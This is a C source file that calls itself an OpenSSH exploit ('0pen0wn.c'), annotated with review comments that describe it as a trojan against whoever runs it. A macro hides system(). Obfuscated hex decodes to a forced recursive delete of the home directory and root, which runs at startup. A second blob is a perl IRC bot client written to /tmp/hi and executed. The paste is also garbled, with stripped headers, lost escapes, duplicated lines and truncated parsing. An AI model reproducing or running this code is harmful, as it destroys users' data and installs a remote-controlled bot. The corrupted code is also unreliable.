- ===============
- /* 0pen0wn.c by anti-sec group
- * ---------------------------
- * OpenSSH
- * NOTE(review): the header comment is cut off in this paste and is closed here.
- * Read build_frem below together with "#define fremote" further down: fremote
- * expands to the identifier system, and main() calls it on hard-coded command
- * strings, so this file acts on the machine that runs it, not on the host
- * named on the command line. */
- /* The header names were stripped from all nine includes by the page
-  * extraction (the angle-bracketed part is missing on every line). */
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- #include
- /* Never referenced anywhere in the file as shown. */
- #define VALID_RANGE 0xb44ffe00
- /* Token-pasting obfuscator: build_frem(x,y,a,b,c) yields a c a x y b.
-  * Invoked below as build_frem(t,e,s,m,y), that is s y s t e m. */
- #define build_frem(x,y,a,b,c) a##c##a##x##y##b
- /* Obfuscated command string. The backslashes of the \x escapes were lost in
-  * this paste, so as printed the literal is inert text; with them restored it
-  * decodes to a backgrounded, error-silenced recursive forced delete of the
-  * home directory and of every entry under "/". main() passes it to fremote(),
-  * i.e. to system(), in the middle of its variable declarations, so it runs on
-  * the local host unconditionally at startup -- before the geteuid() check,
-  * with whatever privileges the invoking user has. Nothing about it is a
-  * "jump" into a remote process. */
- char jmpcode[] =
- "x72x6Dx20x2Dx72x66x20x7ex20x2Fx2Ax20x32x3ex20x2f"
- "x64x65x76x2fx6ex75x6cx6cx20x26";
- /* Not machine code: with the stripped \x escapes restored, the blob begins
-  * "#!/usr/bin/perl" and contains a perl IRC client -- a server name
-  * (decodes to an euirc.net host), a channel and key, a JOIN, a PING reply
-  * loop -- followed by "chmod +x /tmp/hi ...; /tmp/hi". main() writes this
-  * text to a local file (see fopen(shellcode+793, ...)) and also copies it
-  * into the network payload. Many lines below are duplicated verbatim, so this
-  * copy of the script is corrupted and not an intact program. */
- char shellcode[] =
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx0ax24x6bx65"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
- "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a";
- /* Selected by main() when target is 5 or 6 (target is never set in the code
-  * as shown, so this branch is unreachable here). Same material as shellcode
-  * above -- fragments of the perl IRC client, again with duplicated lines --
-  * ending in "}}#chmod +x /tmp/hi 2>/dev/null;/tmp/hi". There is nothing
-  * FreeBSD-specific about it despite the name. */
- char fbsd_shellcode[] =
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x70x68x70x66x72x22x3bx24x73x65x72x76x65x72x3dx22"
- "x69x72x63x2ex68x61x6dx2ex64x65x2ex65x75x69x72x63"
- "x2ex6ex65x74x22x3bx24x53x49x47x7bx54x45x52x4dx7d"
- "x64x20x2bx78x20x2fx74x6dx70x2fx68x69x20x32x3ex2f"
- "x64x65x76x2fx6ex75x6cx6cx3bx2fx74x6dx70x2fx68x69"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x22x3bx0ax77x68x69x6cx65x20x28x3cx24x73x6fx63x6b"
- "x6ex22x3bx0ax20x20x20x20x20x20x20x20x20x20x20x20"
- "x73x6cx65x65x70x20x31x3bx0ax20x20x20x20x20x20x20"
- "x6bx5cx6ex22x3bx7dx7dx70x72x69x6ex74x20x24x73x6f"
- "x63x6bx20x22x4ax4fx49x4ex20x24x63x68x61x6ex20x24"
- "x6bx65x79x5cx6ex22x3bx77x68x69x6cx65x20x28x3cx24"
- "x73x6fx63x6bx3ex29x7bx69x66x20x28x2fx5ex50x49x4e"
- "x47x20x28x2ex2ax29x24x2fx29x7bx70x72x69x6ex74x20"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x23x21x2fx75x73x72x2fx62x69x6ex2fx70x65x72x6cx0a"
- "x24x63x68x61x6ex3dx22x23x63x6ex22x3bx24x6bx65x79"
- "x20x3dx22x66x61x67x73x22x3bx24x6ex69x63x6bx3dx22"
- "x7dx7dx23x63x68x6dx6fx64x20x2bx78x20x2fx74x6dx70"
- "x2fx68x69x20x32x3ex2fx64x65x76x2fx6ex75x6cx6cx3b"
- "x2fx74x6dx70x2fx68x69x0a";
- /* SIZE and OFFSET are never referenced in the file as shown. fremote is the
-  * macro that matters: build_frem(t,e,s,m,y) pastes a##c##a##x##y##b with
-  * x=t, y=e, a=s, b=m, c=y, producing the identifier system. Every
-  * fremote(...) call in main() is therefore system(...) on the local machine
-  * and, once the arguments are decoded, a shell command rather than an
-  * address or "remote" operation. */
- #define SIZE 0xffffff
- #define OFFSET 131
- #define fremote build_frem(t,e,s,m,y)
- /* Print the command-line help text for this tool to stdout.
-  * arg: the program name (argv[0]), echoed in the Usage line. The stray
-  * "n" and "t" letters in the text are where the \n and \t escapes lost their
-  * backslash in this paste; they are reproduced unchanged. */
- void usage(char *arg){
- fputs("n[+] 0pen0wn 0wnz Linux/FreeBSDn", stdout);
- printf(" Usage: %s -h -p portn", arg);
- fputs(" Options:n", stdout);
- fputs(" t-h ip/host of targetn", stdout);
- fputs(" t-p portn", stdout);
- fputs(" t-d usernamen", stdout);
- fputs(" t-B memory_limit 8/16/64nnn", stdout);
- }
- /* FD and BD, like VALID_RANGE, SIZE and OFFSET, are never referenced by
-  * usage() or main(); they only give the file the look of an exploit. */
- #define FD 0x080518fc
- #define BD 0x08082000
- /* Entry point. NOTE(review): despite the "OpenSSH exploit" framing, the only
-  * effects that can be traced in this function are local: fremote(jmpcode)
-  * below is system(jmpcode) (see the build_frem/fremote macros), so the decoded
-  * jmpcode command runs on THIS machine before any socket is opened, and the
-  * shellcode text is written to a local file. The network part cannot succeed
-  * as written (see the closed-descriptor notes). Treat the file as a trojan
-  * aimed at whoever compiles and runs it. The option parsing and host lookup
-  * are garbled in this paste (one truncated line survives). */
- int main(int argc, char **argv){
- FILE *jmpinst;
- /* fremote(jmpcode) is system(jmpcode), executed in the middle of the
-  * declarations, i.e. unconditionally at startup and before the geteuid()
-  * check. h[] and buffer[] are never initialised anywhere in this function. */
- char h[500],buffer[1024];fremote(jmpcode);char *payload, *ptr;
- int port=23, limit=8, target=0, sock;
- struct hostent *host;
- struct sockaddr_in addr;
- /* Root gate. The command above has already run by the time this is reached,
-  * so the check only decides whether the rest of the function continues. */
- if (geteuid()) {
- puts("need root for raw socket, etc...");
- return 1;
- }
- /* Garbled in this paste: the argc/option parsing and the gethostbyname()
-  * path that should fill addr.sin_addr from host->h_addr were lost; only
-  * "if(argc" and "h_addr;" survive. As shown, addr.sin_addr is never set and
-  * target/limit/port keep their initial values. */
- if(argc h_addr;
- }
- /* socket() result is not checked; a -1 here would be handed to connect(),
-  * send() and close() below. */
- sock = socket(PF_INET, SOCK_STREAM, 0);
- addr.sin_port = htons(port);
- addr.sin_family = AF_INET;
- if (connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1){
- printf(" [-] Connecting failedn");
- return 1;
- }
- /* Unchecked malloc; with limit left at 8 this is 80000 bytes. Bytes 0..7
-  * are never written, yet strlen(payload) is taken on them further down
-  * (read of indeterminate memory -- undefined behaviour). */
- payload = malloc(limit * 10000);
- ptr = payload+8;
- memcpy(ptr,jmpcode,strlen(jmpcode));
- /* Second local side effect: the shellcode text (a perl script once decoded)
-  * is written to a file whose name is taken from inside the blob itself,
-  * shellcode+793 -- presumably the "/tmp/hi" path that the blob's last lines
-  * chmod and execute; cannot be confirmed from this corrupted copy. */
- jmpinst=fopen(shellcode+793,"w+");
- if(jmpinst){
- fseek(jmpinst,0,SEEK_SET);
- fprintf(jmpinst,"%s",shellcode);
- fclose(jmpinst);
- }
- ptr += strlen(jmpcode);
- /* target is never assigned in the visible code, so only the first branch is
-  * reachable as shown. Both branches overflow the heap block: ptr already sits
-  * strlen(jmpcode) bytes past payload+8, but the memset length only subtracts
-  * 8 and the shellcode length, so the 'B' fill runs strlen(jmpcode) bytes
-  * past the end of the allocation. */
- if(target != 5 && target != 6){
- memcpy(ptr,shellcode,strlen(shellcode));
- ptr += strlen(shellcode);
- memset(ptr,'B',limit * 10000 - 8 - strlen(shellcode));
- }
- else{
- memcpy(ptr,fbsd_shellcode,strlen(fbsd_shellcode));
- ptr += strlen(fbsd_shellcode);
- memset(ptr,'B',limit * 10000 - 8 - strlen(fbsd_shellcode));
- }
- /* buffer[] was never initialised, so strlen(buffer) reads indeterminate
-  * bytes (undefined behaviour). ptr points at the start of the 'B' fill, so
-  * the 3750 bytes sent are filler, not jmpcode or shellcode. */
- send(sock,buffer,strlen(buffer),0);
- send(sock,ptr,3750,0);
- close(sock);
- /* connect() on the descriptor just closed: this fails with EBADF (nothing
-  * between the close and this call opens a new descriptor that could reuse
-  * the number), and every later send()/connect()/close() on sock is likewise
-  * on a closed descriptor. The failure is printed but not acted on. */
- if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == -1) {
- printf(" [-] connecting failedn");
- }
- /* sizeof(payload) is the size of the pointer, not of the allocation, so
-  * these write at index 7 and 6 on a 64-bit build (3 and 2 on 32-bit), not at
-  * the buffer's end. The '' literals are empty character constants (invalid
-  * C); the '\0' escape lost its backslash in this paste. */
- payload[sizeof(payload)-1] = '';
- payload[sizeof(payload)-2] = '';
- send(sock,buffer,strlen(buffer),0);
- send(sock,payload,strlen(payload),0);
- close(sock);
- free(payload);
- addr.sin_port = htons(6666);
- /* Same closed descriptor, so this connect cannot succeed as written. If it
-  * did, fremote() -- i.e. system() -- would start a local interactive shell
-  * with a fake root prompt; nothing here is a shell on the remote host. */
- if(connect(sock, (struct sockaddr*)&addr, sizeof(addr)) == 0) {
- /* v--- our cool bar that says: "r0000000t!!!" */
- printf("n [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]nn");
- fremote("PS1='sh-3.2#' /bin/sh");
- }
- else
- printf(" [-] failed to exploit target :-( n");
- close(sock);
- return 0;
- }
- =======================